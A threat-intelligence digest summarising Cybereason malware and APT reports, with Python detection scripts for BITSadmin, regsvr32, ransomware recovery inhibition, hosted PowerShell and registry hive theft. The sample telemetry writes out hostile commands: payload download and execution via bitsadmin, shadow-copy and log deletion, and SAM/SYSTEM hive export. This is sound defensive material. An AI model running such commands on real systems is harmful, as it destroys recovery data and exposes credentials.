Operation CuckooBees

May 17, 2022

Operation CuckooBees

Industry: Aerospace, Biotechnology, Defense, Energy, Pharmaceuticals | Level: Strategic | Source: Cybereason

Cybereason conducted a 12-month investigation, named Operation CuckooBees, into a sophisticated global cyber espionage campaign stealing intellectual property. The campaign is attributed to the Chinese state-sponsored APT group Winnti. Industries impacted are identified as Aerospace, Biotechnology, Defense, Energy, and Pharmaceuticals, with victims in North America, Europe, and Asia. Cybereason identified many companies that never revealed a breach, and evidence points to a longer campaign stemming as far back as 2019. The business impact of intellectual property theft is not as immediate as that of threats like ransomware or DDoS; the market and financial impact plays out over the long term. A company's investment in research and development (R&D) can't be recouped, and competing becomes more difficult when the company is competing against its own product. Common weaknesses are cited as the cause of compromise in affected organizations, such as “unpatched systems, insufficient network segmentation, unmanaged assets, forgotten accounts, and a lack of multi-factor authentication.” Although a representative from the Chinese Embassy denied Chinese involvement in cyberattacks, such a denial from a nation-state actor is likely untrue.

Quantum Ransomware Analyzed by Cybereason

May 17, 2022

Cybereason has been analyzing Quantum ransomware, a rebrand in a lineage of ransomware that began with Mount Locker (September 2020), followed by Astro Locker (March 2021) and Xing Locker (May 2021).

Tricks from SocGholish and Zloader

May 03, 2022

Cybereason's latest report, which tracks malware activity from SocGholish and Zloader, details the malware's capabilities and infection tactics. SocGholish is named (in part) for its social engineering tactics, which lure victims into drive-by downloads, often themed as critical browser updates.

Cybereason LOLBins & BITSadmin

March 15, 2022

Cybereason LOLBins & BITSadmin

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s threat hunting post examines the use of Living Off the Land Binaries (LOLBins) and takes a deep dive into the tool BITSadmin. Many malware and ransomware variants abuse trusted binaries for threat activity. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins can be reviewed in the LOLBAS project on GitHub, and many detections are also available in the Anvilogic Armory. Analysis of BITSAdmin identified that the tool has many applicable uses to “create, download, or upload jobs and monitor their progress,” as detailed in Microsoft’s documentation. Attackers have leveraged BITSadmin’s capabilities to download malicious payloads and/or to copy and move files. Malware such as the Astaroth malware, Egregor ransomware and Ramnit trojan have utilized BITSadmin.

  • Anvilogic Scenario: Astaroth – Attack Chain with LOLBins
  • Anvilogic Use Cases:
    • BITSadmin Execution
    • Msiexec Abuse
    • Wscript/Cscript Execution
    • regsvr32 Execution
    • Rundll32 Command Line
    • Suspicious process Spawned by Java
    • Certutil File Download
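The BITSadmin abuse described above leaves a recognisable trail in process-creation telemetry, because the job lifecycle (`/create`, `/addfile`, `/SetNotifyCmdLine`, `/resume`, or a one-shot `/transfer`) is spelled out on the command line. The following hunting script is an added example written for this digest; it is not code from Cybereason or from the Anvilogic use cases. It assumes a simplified `image|command line` record format and uses constructed sample events; the scoring weights and the hypothetical job names are illustrative.

```python
"""Hunt for BITSadmin jobs used to fetch and launch files (added example).

Reconstructs the BITS job lifecycle (create -> addfile -> SetNotifyCmdLine -> resume,
or a one-shot /transfer) from process-creation command lines and scores each job.
"""
import re
import shlex
from collections import defaultdict
from typing import Dict, List

# Constructed sample process-creation records (not from any report): "image|command line".
SAMPLE_PROCESS_EVENTS = r"""
C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job1 /download /priority normal http://example.invalid/payload.bin C:\Users\Public\payload.bin
C:\Windows\System32\bitsadmin.exe|bitsadmin /create backdoor
C:\Windows\System32\bitsadmin.exe|bitsadmin /addfile backdoor https://example.invalid/x.dat C:\Users\Public\x.dat
C:\Windows\System32\bitsadmin.exe|bitsadmin /SetNotifyCmdLine backdoor C:\Users\Public\x.dat NULL
C:\Windows\System32\bitsadmin.exe|bitsadmin /resume backdoor
C:\Windows\System32\bitsadmin.exe|bitsadmin /list /allusers
C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer wu http://wsus.corp.local/update.cab C:\Windows\SoftwareDistribution\Download\update.cab
""".strip()

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# Locations a standard user can write to; patch-management jobs rarely land here.
USER_WRITABLE_RE = re.compile(r"\\(users\\public|appdata|temp|programdata)\\", re.IGNORECASE)
# Switches whose next non-switch argument is a job name (display name or GUID).
JOB_SWITCHES = {"/create", "/addfile", "/setnotifycmdline", "/resume", "/complete", "/transfer"}
# Weights are illustrative: execution-on-completion dominates the score.
WEIGHTS = {"remote_download": 1, "user_writable_destination": 1, "notify_cmdline": 3}
ALERT_THRESHOLD = 2


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line without treating backslashes as escapes."""
    return shlex.split(cmdline, posix=False)


def job_name(tokens: List[str]) -> str:
    """Return the job a command refers to, or "" for commands such as /list."""
    for i, tok in enumerate(tokens):
        if tok.lower() in JOB_SWITCHES:
            j = i + 1
            # /create may take a type switch first (/download, /upload); /priority takes a value.
            while j < len(tokens) and tokens[j].startswith("/"):
                j += 2 if tokens[j].lower() == "/priority" else 1
            return tokens[j].strip('"') if j < len(tokens) else ""
    return ""


def observations(tokens: List[str]) -> List[str]:
    """Map one command line to the observation kinds it exhibits."""
    switches = {t.lower() for t in tokens if t.startswith("/")}
    found = []
    if switches & {"/transfer", "/addfile"} and any(URL_RE.match(t) for t in tokens):
        found.append("remote_download")
    if any(USER_WRITABLE_RE.search(t) for t in tokens):
        found.append("user_writable_destination")
    if "/setnotifycmdline" in switches:
        found.append("notify_cmdline")
    return found


def hunt_bits_jobs(log_text: str) -> Dict[str, dict]:
    """Aggregate bitsadmin command lines per job and return jobs at or above the threshold."""
    jobs: Dict[str, dict] = defaultdict(lambda: {"switches": set(), "observations": set(), "cmdlines": []})
    for line in log_text.splitlines():
        image, _, cmdline = line.partition("|")
        if not image.lower().endswith("bitsadmin.exe"):
            continue
        tokens = tokenize(cmdline)
        name = job_name(tokens)
        if not name:
            continue  # /list, /info and similar carry no job to track
        job = jobs[name]
        job["switches"].update(t.lower() for t in tokens if t.startswith("/"))
        job["observations"].update(observations(tokens))
        job["cmdlines"].append(cmdline)
    findings = {}
    for name, job in jobs.items():
        score = sum(WEIGHTS[o] for o in job["observations"])
        if score >= ALERT_THRESHOLD:
            findings[name] = {"score": score, "observations": sorted(job["observations"]),
                              "switches": sorted(job["switches"]), "cmdlines": job["cmdlines"]}
    return findings


if __name__ == "__main__":
    for name, finding in hunt_bits_jobs(SAMPLE_PROCESS_EVENTS).items():
        print(f"job {name!r}: score {finding['score']} {finding['observations']}")
```

Aggregating per job rather than per command line is what makes the multi-step variant visible: `/create` and `/resume` are harmless on their own, and only the combination of a remote source, a user-writable destination and `/SetNotifyCmdLine` pushes the job over the threshold, while the WSUS-style transfer to the SoftwareDistribution folder stays below it.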

Emotet Surges in Japan

March 15, 2022

Emotet Surges in Japan

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s tracking of Emotet malware in the first quarter of 2022 has identified a surge of Emotet activity against Japanese organizations. Emotet is distributed through malicious Excel documents that download the malware upon execution. The malware uses regsvr32 to execute a malicious DLL, although the file carries a .ocx extension. Subsequent events involve the malware establishing persistence in the registry and conducting reconnaissance activity. Cybereason noted that Emotet, in its current attacks, has not utilized PowerShell for deployment.

  • Anvilogic Scenarios:
    • Emotet Behaviors
    • Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • New AutoRun Registry Key
    • Common Reconnaissance Commands
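The regsvr32 and registry persistence behaviour above is more reliably detected as a chain than as two isolated events: regsvr32 registering an .ocx file is normal for ActiveX controls, so the module's location and what the process does next are what matter. The script below is an added example for this digest, not Cybereason's analysis or Anvilogic's detection content. It assumes a hypothetical flattened telemetry format (`timestamp|pid|event|image|detail`) and uses constructed events; the weights, the 60-second correlation window and the user SID are illustrative.

```python
"""Correlate regsvr32 launches with Run-key persistence (added example).

Scores each regsvr32 execution on three signals: the module's extension is not .dll,
the module lives in a user-writable folder, and the same process writes a Run/RunOnce
value shortly afterwards.
"""
import re
import shlex
from datetime import datetime, timedelta
from typing import List

# Constructed sample telemetry, not from Cybereason: "timestamp|pid|event|image|detail".
SAMPLE_EVENTS = r"""
2022-03-01T09:00:01|4120|ProcessCreate|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xlsm
2022-03-01T09:00:05|4312|ProcessCreate|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\ewfu.ocx
2022-03-01T09:00:07|4312|RegistrySet|C:\Windows\System32\regsvr32.exe|HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\ewfu
2022-03-01T09:30:00|5000|ProcessCreate|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s "C:\Program Files\Vendor\comctl.ocx"
2022-03-01T09:45:00|6001|ProcessCreate|C:\Windows\System32\regsvr32.exe|regsvr32 /s C:\Windows\System32\vbscript.dll
""".strip()

USER_WRITABLE_RE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop)|users\\public|programdata|temp)\\", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.IGNORECASE)
WEIGHTS = {"non_dll_extension": 1, "user_writable_module": 2, "run_key_written": 3}
ALERT_THRESHOLD = 3
CORRELATION_WINDOW = timedelta(seconds=60)


def parse_events(text: str) -> List[dict]:
    """Turn the flattened records into dicts with a real timestamp."""
    events = []
    for line in text.splitlines():
        ts, pid, kind, image, detail = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "pid": pid,
                       "kind": kind, "image": image, "detail": detail})
    return events


def module_path(cmdline: str) -> str:
    """The module regsvr32 was asked to load: the last argument that is not a switch."""
    args = [t.strip('"') for t in shlex.split(cmdline, posix=False)[1:] if not t.startswith("/")]
    return args[-1] if args else ""


def find_suspicious_regsvr32(text: str) -> List[dict]:
    """Return scored regsvr32 launches whose combined signals reach the alert threshold."""
    events = parse_events(text)
    findings = []
    for ev in events:
        if ev["kind"] != "ProcessCreate" or not ev["image"].lower().endswith("\\regsvr32.exe"):
            continue
        module = module_path(ev["detail"])
        signals = []
        if not module.lower().endswith(".dll"):
            signals.append("non_dll_extension")
        if USER_WRITABLE_RE.search(module):
            signals.append("user_writable_module")
        # Same pid writing a Run/RunOnce value within the window after the launch.
        for other in events:
            if (other["kind"] == "RegistrySet" and other["pid"] == ev["pid"]
                    and ev["ts"] <= other["ts"] <= ev["ts"] + CORRELATION_WINDOW
                    and RUN_KEY_RE.search(other["detail"])):
                signals.append("run_key_written")
                break
        score = sum(WEIGHTS[s] for s in signals)
        if score >= ALERT_THRESHOLD:
            findings.append({"pid": ev["pid"], "module": module, "score": score, "signals": signals})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_regsvr32(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['module']} score={f['score']} {f['signals']}")
```

The vendor control registered from Program Files scores only one point for its .ocx extension and is not reported, whereas the module loaded from the user's Temp folder and followed by a Run value from the same pid reaches the threshold. A real pipeline would index RegistrySet events by pid instead of scanning the list, but the correlation logic is the same.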

Lorenz Ransomware

March 08, 2022

Lorenz Ransomware

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason reports that Lorenz ransomware was observed as early as February 2021 and is likely a rebranding of the .sZ40 ransomware discovered in October 2020. The attackers have compromised over 20 victims, predominantly in “English-speaking countries,” across a variety of industries. Europol’s European Cybercrime Center was able to set the ransomware group back as part of the “No More Ransom” project, when a limited decryptor was released for the group’s ransomware. The threat group’s attack method is methodical, studying the victim’s network to create a customized, tailored operation. For example, the attackers impersonate “the target’s employees, suppliers and partners. This way, the Lorenz group can even go from one, already compromised victim, to another.” After gaining a foothold on the network, “the attackers start to perform reconnaissance commands, move laterally within the network, and collect sensitive data including credentials, file, databases and emails.” Given the group’s customized approach, threat behavior has varied. Common behaviors associated with the ransomware include the use of a scheduled task to execute vssadmin to delete volume shadow copies, and older samples of Lorenz have cleared Windows event logs. A unique extortion method the group uses involves selling the compromised data to other threat actors or to competitors; if the ransom isn’t paid, they leak the data publicly. Lastly, the ransomware group also sells access to networks they’ve compromised.

  • Anvilogic Use Cases:
    • Inhibit System Recovery Commands
    • Create/Modify Schtasks
    • Registry key added with reg.exe
    • Clear Windows Event Logs
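The Lorenz behaviours above (vssadmin run from a scheduled task, Windows logs cleared) are covered by the "Inhibit System Recovery" and "Clear Windows Event Logs" use cases, but the scheduled-task variant is easy to miss if a rule only inspects the image name, because the process that is created is `schtasks.exe` and the recovery-inhibiting command sits inside its `/tr` argument. The script below is an added example written for this digest, not Cybereason's or Anvilogic's code; it assumes an `image|command line` record format, uses constructed sample events, and the task names are hypothetical.

```python
"""Detect recovery-inhibition and log-clearing commands, including ones embedded in a
scheduled task's action (added example)."""
import re
import shlex
from typing import List, Optional

# Constructed sample process-creation records, not from Cybereason: "image|command line".
SAMPLE_PROCESS_EVENTS = r"""
schtasks.exe|schtasks /create /tn "SystemCleanup" /tr "cmd.exe /c vssadmin delete shadows /all /quiet & wbadmin delete catalog -quiet" /sc once /st 00:00 /ru SYSTEM /f
vssadmin.exe|vssadmin list shadows
wevtutil.exe|wevtutil cl Security
schtasks.exe|schtasks /create /tn "Backup" /tr "C:\Program Files\Backup\agent.exe --nightly" /sc daily /st 02:00
bcdedit.exe|bcdedit /set {default} recoveryenabled No
""".strip()

# Each pattern names one well-known recovery-inhibition or log-clearing command shape.
PATTERNS = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.IGNORECASE),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\b.*\bcatalog\b", re.IGNORECASE),
    "bcdedit_disable_recovery": re.compile(
        r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.IGNORECASE),
    "wevtutil_clear_log": re.compile(r"\bwevtutil(\.exe)?\b\s+(cl|clear-log)\b", re.IGNORECASE),
}


def classify(command: str) -> List[str]:
    """Tags for every pattern the command matches, in PATTERNS order."""
    return [tag for tag, rx in PATTERNS.items() if rx.search(command)]


def scheduled_task_action(cmdline: str) -> Optional[dict]:
    """For `schtasks /create`, return the task name (/tn) and the command it will run (/tr)."""
    tokens = shlex.split(cmdline, posix=False)   # keeps quoted /tr payload as one token
    lowered = [t.lower() for t in tokens]
    if "/create" not in lowered:
        return None

    def arg_after(switch: str) -> str:
        if switch in lowered and lowered.index(switch) + 1 < len(tokens):
            return tokens[lowered.index(switch) + 1].strip('"')
        return ""

    return {"task_name": arg_after("/tn"), "action": arg_after("/tr")}


def hunt_recovery_inhibition(log_text: str) -> List[dict]:
    """Classify each record; for schtasks /create, classify the nested action instead."""
    findings = []
    for line in log_text.splitlines():
        image, _, cmdline = line.partition("|")
        task = scheduled_task_action(cmdline) if image.lower().endswith("schtasks.exe") else None
        command = task["action"] if task else cmdline
        tags = classify(command)
        if tags:
            findings.append({"image": image, "tags": tags, "via_schtasks": task is not None,
                             "task_name": task["task_name"] if task else "", "command": command})
    return findings


if __name__ == "__main__":
    for f in hunt_recovery_inhibition(SAMPLE_PROCESS_EVENTS):
        where = f"task {f['task_name']!r}" if f["via_schtasks"] else f["image"]
        print(f"{where}: {f['tags']}")
```

Unwrapping the `/tr` argument gives the analyst the task name to remove and shows both chained commands (`&`) in one finding, while the benign nightly backup task and the read-only `vssadmin list shadows` produce nothing.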

Cybereason Threat Analysis Report

February 15, 2022

Cybereason’s Global Security Operations Center (GSOC) team provides a threat analysis report detailing comprehensive attack scenarios in which the malware loaders IcedID, QBot, and Emotet lead to compromises involving Cobalt Strike.

Phosphorus/APT32 New PowerLess Trojan

February 08, 2022

Phosphorus/APT32 New PowerLess Trojan

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason research has identified the Iranian group Phosphorus/APT35/Charming Kitten utilizing a new PowerShell tool, “PowerLess Backdoor,” while also exploiting the Log4Shell vulnerability. The new malware can download additional payloads for information stealing, but it is notable for a new stealth technique, as detailed in the report: “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic doesn’t prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on IOCs reviewed from Cybereason, the infrastructure utilized for the attack is highly active, with an observed IP address overlapping with Memento Ransomware, suggesting a potential connection between the threat actor group and the ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell
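The point that hosting the PowerShell engine inside a .NET process "doesn't prevent PowerShell events from being logged" is the defender's lever: the engine-lifecycle events in the Windows PowerShell log (IDs 400 and 403) carry HostName and HostApplication fields that name the hosting executable, so a host that is not powershell.exe, powershell_ise.exe or pwsh.exe stands out. The script below is an added example for this digest, not Cybereason's analysis or Anvilogic's rule. It assumes the events have been flattened to `key=value` pairs (a constructed format), uses constructed sample values, and treats the "Default Host" HostName string and the hypothetical executable paths as illustrative.

```python
"""Spot PowerShell engine activity hosted by a process that is not PowerShell (added example).

The Windows PowerShell log's engine-lifecycle events (IDs 400/403) include HostName and
HostApplication, which identify the executable hosting the engine even when no
powershell.exe process was ever created.
"""
import re
from typing import Dict, List

# Hosts that normally own a PowerShell engine; anything else deserves a look.
KNOWN_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
USER_WRITABLE_RE = re.compile(r"\\(users\\public|appdata|temp|programdata)\\", re.IGNORECASE)

# Constructed sample events (not from Cybereason), flattened to "key=value" pairs.
SAMPLE_EVENTS = r"""
EventID=400|HostName=ConsoleHost|HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -File C:\scripts\inventory.ps1
EventID=400|HostName=Default Host|HostApplication=C:\Users\Public\Libraries\update.exe
EventID=400|HostName=Windows PowerShell ISE Host|HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
EventID=403|HostName=Default Host|HostApplication=C:\Users\Public\Libraries\update.exe
EventID=400|HostName=Default Host|HostApplication=C:\Program Files\Vendor\Console.exe
""".strip()


def parse_event(line: str) -> Dict[str, str]:
    """One flattened record -> dict of its fields."""
    return dict(field.split("=", 1) for field in line.split("|"))


def host_executable(host_application: str) -> str:
    """First token of HostApplication (the executable path), lower-cased."""
    app = host_application.strip()
    if app.startswith('"'):
        return app[1:app.find('"', 1)].lower()
    return app.split(" ", 1)[0].lower()


def find_hosted_powershell(text: str) -> List[dict]:
    """One finding per unknown host executable, user-writable locations first."""
    findings: Dict[str, dict] = {}
    for line in text.splitlines():
        ev = parse_event(line)
        exe = host_executable(ev.get("HostApplication", ""))
        if exe.rsplit("\\", 1)[-1] in KNOWN_HOSTS:
            continue
        f = findings.setdefault(exe, {
            "host_application": exe,
            "host_name": ev.get("HostName", ""),
            "event_ids": [],
            "user_writable_path": bool(USER_WRITABLE_RE.search(exe)),
        })
        f["event_ids"].append(int(ev.get("EventID", "0")))
    return sorted(findings.values(), key=lambda f: not f["user_writable_path"])


if __name__ == "__main__":
    for f in find_hosted_powershell(SAMPLE_EVENTS):
        print(f"{f['host_application']} host={f['host_name']!r} events={f['event_ids']}"
              f"{' (user-writable path)' if f['user_writable_path'] else ''}")
```

Legitimate .NET applications do embed the engine (management consoles, build tools), so the second finding from Program Files is a candidate for an allowlist rather than an alert; the value of the check is that the engine's own logging cannot be avoided by skipping the powershell.exe process, which is exactly the gap the evasion technique relies on.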

ProxyShell Exploited with DatopLoader Leading to Qakbot

January 18, 2022

ProxyShell Exploited with DatopLoader Leading to Qakbot

Industry: N/A | Level: Operational | Source: Cybereason

A threat report from Cybereason and security researcher Orange Tsai investigates a new malware loader, DatopLoader, that emerged in September 2021. The loader was observed being dropped following the attacker’s successful exploitation of ProxyShell and Exchange vulnerabilities. Once the loader is executed, Qakbot/Qbot lands on the victim’s workstation to set up persistence and conduct reconnaissance activity, using largely native tools with the exception of AdFind. Cobalt Strike is also launched, using PsExec to move laterally in the environment. In addition, credential access has been identified through gathering from registry hives.

  • Anvilogic Scenario: DatopLoader & Qakbot
  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Common Exchange Recon cmdlets
    • Exchange Remove Export Request
    • regsvr32 Execution
    • Credentials in Registry
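Credential gathering from registry hives, the last behaviour noted above and the target of the "Credentials in Registry" use case, usually shows up as `reg.exe save` or `export` of the SAM, SECURITY or SYSTEM hives, written in any of several spellings (`HKLM`, `HKEY_LOCAL_MACHINE`, mixed case, quoted). The script below is an added example for this digest, not Cybereason's or Anvilogic's code; it assumes a `host|image|command line` record format and uses constructed sample events with hypothetical host names.

```python
"""Flag registry hive exports that expose credential material (added example).

Normalises the key argument of `reg save` / `reg export` so that the spelling variants
collapse to one form, then summarises per host which credential hives were exported.
"""
import shlex
from typing import Dict

# Constructed sample process-creation records, not from Cybereason: "host|image|command line".
SAMPLE_PROCESS_EVENTS = r"""
ws01|C:\Windows\System32\reg.exe|reg save HKLM\SAM C:\Users\Public\sam.hiv
ws01|C:\Windows\System32\reg.exe|reg save hklm\security C:\Users\Public\sec.hiv
ws01|C:\Windows\System32\reg.exe|reg.exe save "HKEY_LOCAL_MACHINE\SYSTEM" C:\Users\Public\sys.hiv
ws02|C:\Windows\System32\reg.exe|reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
ws02|C:\Windows\System32\reg.exe|reg export HKCU\Software\Vendor C:\Users\alice\vendor.reg
ws03|C:\Windows\System32\reg.exe|reg save HKLM\SYSTEM C:\Windows\Temp\system.hiv
""".strip()

CREDENTIAL_HIVES = {"sam", "security", "system"}
HIVE_ALIASES = {"hkey_local_machine": "hklm"}


def normalize_key(key: str) -> str:
    """Canonical 'hklm\\sam' form: quotes removed, root alias expanded, lower case."""
    root, _, rest = key.strip('"').replace("/", "\\").partition("\\")
    root = HIVE_ALIASES.get(root.lower(), root.lower())
    return root + ("\\" + rest.lower() if rest else "")


def exported_credential_hive(cmdline: str) -> str:
    """Return the credential hive a `reg save|export` targets, or "" if none."""
    tokens = shlex.split(cmdline, posix=False)
    if len(tokens) < 3 or tokens[1].lower() not in {"save", "export"}:
        return ""
    key = normalize_key(tokens[2])
    if key.startswith("hklm\\"):
        hive = key.split("\\")[1]
        if hive in CREDENTIAL_HIVES:
            return hive
    return ""


def hunt_hive_exports(log_text: str) -> Dict[str, dict]:
    """Per host: which credential hives were exported, and whether SAM and SYSTEM both were
    (the pair that together exposes local account password hashes)."""
    per_host: Dict[str, dict] = {}
    for line in log_text.splitlines():
        host, image, cmdline = line.split("|", 2)
        if not image.lower().endswith("\\reg.exe"):
            continue
        hive = exported_credential_hive(cmdline)
        if not hive:
            continue
        entry = per_host.setdefault(host, {"hives": set(), "cmdlines": []})
        entry["hives"].add(hive)
        entry["cmdlines"].append(cmdline)
    for entry in per_host.values():
        entry["sam_and_system"] = {"sam", "system"} <= entry["hives"]
    return per_host


if __name__ == "__main__":
    for host, entry in hunt_hive_exports(SAMPLE_PROCESS_EVENTS).items():
        print(f"{host}: hives={sorted(entry['hives'])} sam_and_system={entry['sam_and_system']}")
```

Summarising per host matters for triage: a lone SYSTEM export has legitimate uses (backup and support tooling), whereas SAM and SYSTEM together from the same host, written to a user-writable folder, is the pattern that warrants immediate credential rotation for the local accounts involved.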